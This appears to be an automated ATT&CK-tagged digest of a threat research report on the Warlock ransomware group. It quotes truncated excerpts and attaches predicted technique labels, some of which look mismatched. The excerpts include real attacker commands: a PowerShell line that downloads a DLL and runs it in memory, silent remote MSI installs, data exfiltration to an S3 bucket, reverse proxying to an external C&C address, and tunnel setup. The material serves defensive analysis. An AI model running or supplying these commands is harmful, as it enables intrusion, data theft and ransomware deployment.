TTPwire Vol. 1 · MITRE ATT&CK·Tagged


Trend Micro Research

Web Shells, Tunnels, and Ransomware: Dissecting a Warlock Attack

Don Ovid Ladores · 2026-03-16

ATT&CK techniques detected

26 predictions

T1059.001 PowerShell (99%)
  "hosted on a Supabase storage: c:\windows\system32\msiexec.exe /q /i hxxps[://]vdfccjpnedujhrzscjtq[.]supabase[.]co/storage/v1/object/public/image/v4[.]msi VS Code Following installation, Velociraptor downloaded VS Code using an encoded Powers…"

T1055.001 Dynamic-link Library Injection (98%)
  "spawned by Velociraptor service: eventsubid: 901 AND parentcmd: velociraptorservicerun AND processfilepath: powershell.exe Hunts encoded PowerShell execution using Reflection Assembly Load: processcmd: "powershell.exe *unrestricted -encodedcommand" AND objectrawdatast…"

T1567.002 Exfiltration to Cloud Storage (97%)
  "command below shows the threat actors exfiltrating data from a targeted file share directly to an attacker-controlled S3 bucket: trendfilesecuritycheck.exe copy \\redacted\redacted :s3:redacted/src -P --include "*.{pdf,ai,dwg,dxf,dwt,doc,docx,dwg,dwt,d…"

T1068 Exploitation for Privilege Escalation (95%)
  "(VPS). Other reports have noted that multiple high-profile ransomware groups are using this same infrastructure for their secondary-stage operations. Defense Evasion (BYOVD) In our previous report, the threat actors renamed rclone.exe to trendsecurity.exe to appear legi…"

T1068 Exploitation for Privilege Escalation (95%)
  "…run.dll,runcryptor 2>nul || exit" Following encryption, the ransomware then drops a ransom note named lockdatareadme.txt on affected systems. Table 2. Summary of TTPs used by Warlock Security recommendations Mitigating BYOVD attacks Warlock's reliance on vulnerable drive…"

T1218.011 Rundll32 (93%)
  "…\public\trendsecurity.exe 2>nul || exit" This approach ensures malware deployment occurs automatically when systems boot or when Group Policy refreshes, thereby enabling rapid enterprise-wide infection without requiring individual system access. The primary ransomware p…"

T1572 Protocol Tunneling (91%)
  "…86)\cloudflared\cloudflared.exe" service install <token> Named tunnel execution: "c:\program files (x86)\cloudflared\cloudflared.exe" tunnel run --token <token> Quick tunnel (ad-hoc reverse proxy to local webserver): cloudflared.exe tunnel --ur…"

T1572 Protocol Tunneling (79%)
  "…ssocks.exe, a .NET payload designed for in-memory execution. This step aligned with the observed technique of downloading bytes directly and running them via Assembly.Load() and EntryPoint.Invoke() without writing to disk. Cloudflare Tunnel The commands below show the …"

T1071 Application Layer Protocol (75%)
  "….exe) on the compromised server. The telemetry revealed w3wp.exe spawning a Cobalt Strike beacon agent that utilized the DLL-sideloading technique. The legitimate binary was from the Microsoft Edge browser named msmpsrv.exe (original: cookie_exporter.exe) that sideloa…"

T1071.001 Web Protocols (72%)
  "….exe) on the compromised server. The telemetry revealed w3wp.exe spawning a Cobalt Strike beacon agent that utilized the DLL-sideloading technique. The legitimate binary was from the Microsoft Edge browser named msmpsrv.exe (original: cookie_exporter.exe) that sideloa…"

T1572 Protocol Tunneling (71%)
  "…0092b/vscode_cli_win32_x64_cli.zip" -outfile "c:\programdata\microsoft\appv\code.zip" c:\windows\debug\code-insiders.exe" --verbose --cli-data-dir c:\users\[redacted]\.vscode\cli tunnel service internal-run --log-to-…"

T1003.006 DCSync (65%)
  "A tool named debug.exe was used to impersonate a domain controller (DC) and retrieve user credentials from another DC via the MS Directory Replication Service Remote Protocol (MS-DRSR), constituting a DCSync attack. Lateral Movement Following initial access, the threat act…"

T1003.006 DCSync (65%)
  "c:\programdata\vs.bat via cmd.exe. This script was invoked twice within a five-minute window, indicating either a retry mechanism or a two-stage execution sequence. The web shell cproxy.aspx was then written to c:\programdata\cproxy.aspx by w3wp.exe, confirming…"

T1068 Exploitation for Privilege Escalation (64%)
  "TrendAI™ as Water Manaul). In our previous article, we detailed how Warlock exploited unpatched Microsoft SharePoint servers to deploy LockBit-derived ransomware with the .x2anylock extension, using Cloudflare Tunnels for command and control (C&C) and rclone for data exfil…"

T1068 Exploitation for Privilege Escalation (59%)
  "An expanded arsenal While Warlock's initial access method remains unchanged in this incident (exploiting vulnerable internet-facing SharePoint servers), the group has significantly expanded its post-exploitation toolkit. In the previous campaigns, Warlock relied on Veloci…"

T1218.011 Rundll32 (56%)
  "…0092b/vscode_cli_win32_x64_cli.zip" -outfile "c:\programdata\microsoft\appv\code.zip" c:\windows\debug\code-insiders.exe" --verbose --cli-data-dir c:\users\[redacted]\.vscode\cli tunnel service internal-run --log-to-…"

T1090.002 External Proxy (55%)
  "…dll,runyuze reverse -c 198[.]13[.]158[.]193:443 rundll32 yuze.dll,runyuze reverse -c 198[.]13[.]158[.]193:53 (DNS port) These commands establish a reverse proxy connection to the attacker's external C&C server across multiple ports: HTTP (80), …"

T1219 Remote Access Tools (53%)
  "…force -skipnetworkprofilecheck" RDP patcher/wrapper RDP patcher enables the non-server Windows edition to have concurrent RDP sessions. Multiple sessions are allowed; thus, administrators are less likely to notice or disconnect an existing session, preventing any detections…"

T1105 Ingress Tool Transfer (48%)
  "…Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData('hxxps://files[.]catbox[.]moe/wzsjlw.dll')).EntryPoint.Invoke($null, (,[string[]](\"4567\")))"] ["[Net.ServicePointManager]::SecurityProtocol = [Net.S…"

T1021.001 Remote Desktop Protocol (47%)
  "…movement. Defending against these requires restricting tool execution, segmenting administrative traffic, and implementing granular logging to detect anomalous behavior. Critical access controls and monitoring include: - Strict application control: Implement application allowli…"

T1105 Ingress Tool Transfer (42%)
  "Warlock group's known use of BYOVD and security-tool evasion techniques. Approximately two weeks later, a second wave of activity was observed on the same compromised SharePoint server. The w3wp.exe process spawned msiexec.exe to silently download and install a remote MSI p…"

T1190 Exploit Public-Facing Application (42%)
  "TrendAI™ as Water Manaul). In our previous article, we detailed how Warlock exploited unpatched Microsoft SharePoint servers to deploy LockBit-derived ransomware with the .x2anylock extension, using Cloudflare Tunnels for command and control (C&C) and rclone for data exfil…"

T1059.001 PowerShell (41%)
  "…Reflection.Assembly]::Load((New-Object Net.WebClient).DownloadData('hxxps://files[.]catbox[.]moe/wzsjlw.dll')).EntryPoint.Invoke($null, (,[string[]](\"4567\")))"] ["[Net.ServicePointManager]::SecurityProtocol = [Net.S…"

T1190 Exploit Public-Facing Application (38%)
  "An expanded arsenal While Warlock's initial access method remains unchanged in this incident (exploiting vulnerable internet-facing SharePoint servers), the group has significantly expanded its post-exploitation toolkit. In the previous campaigns, Warlock relied on Veloci…"

T1059.001 PowerShell (35%)
  "spawned by Velociraptor service: eventsubid: 901 AND parentcmd: velociraptorservicerun AND processfilepath: powershell.exe Hunts encoded PowerShell execution using Reflection Assembly Load: processcmd: "powershell.exe *unrestricted -encodedcommand" AND objectrawdatast…"

T1652 Device Driver Discovery (35%)
  "…run.dll,runcryptor 2>nul || exit" Following encryption, the ransomware then drops a ransom note named lockdatareadme.txt on affected systems. Table 2. Summary of TTPs used by Warlock Security recommendations Mitigating BYOVD attacks Warlock's reliance on vulnerable drive…"

Summary

Warlock continues to enhance its attack chain with new tactics to improve persistence, lateral movement, and defense evasion using an expanded toolset: TightVNC, Yuze, and a persistent BYOVD technique leveraging the NSec driver.